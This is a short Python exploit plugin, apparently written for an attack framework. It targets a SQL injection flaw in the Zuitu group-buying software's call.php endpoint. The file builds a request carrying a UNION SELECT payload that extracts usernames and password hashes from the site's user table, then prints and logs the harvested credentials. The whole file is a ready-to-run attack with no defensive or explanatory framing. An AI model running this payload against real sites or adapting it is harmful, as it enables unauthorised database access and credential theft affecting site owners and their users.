# -*- coding: utf-8 -*-
class mstplugin:
    '''Zuitu sqlinject'''
    infos = [
        ['Plugin','Zuitu call.php SqlInject Exp'],
        ['AUTHOR','teamtopkarl'],
        ['Update','2013/10/25'],
        ['site','http://hi.baidu.com/teamtopkarl']
        ]
    opts  = [
        ['URL','www.xxxxxx.com','Url'],
        ['PATH','/api/','Cms path'],
        ['PORT','80','port']
        ]
    def exploit(self):
        '''start exploit'''
        url = fuck.urlformate(URL,PORT,PATH)
        exp = url+"call.php?action=query&num=j8g'%29/**/union/**/select/**/1,2,3,concat(username,0x7e,password),5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/user/**/limit/**/0,1%23"
        color.cprint("[*] Sending exp..",YELLOW)
        ok  = fuck.urlget(exp)
        if ok.getcode() == 200:
            tmp=fuck.find('[>]+\w+[~]+\w+[<]+',ok.read())
            if len(tmp)>0:
                color.cprint("[*] Exploit Successful !",GREEN)
                i=1
                for res in tmp:
                    res=res[1:len(res)-1]
                    color.cprint("[%s] %s"%(i,res),GREEN)
                    fuck.writelog("zuitu_call_php_sqli",URL+"::"+res)
                    i+=1
            else:
                color.cprint("[!] TARGET NO VULNERABLE !",RED)
        else:
            color.cprint("[!] EXPLOIT FALSE ! CODE:%s"%ok.getcode(),RED)
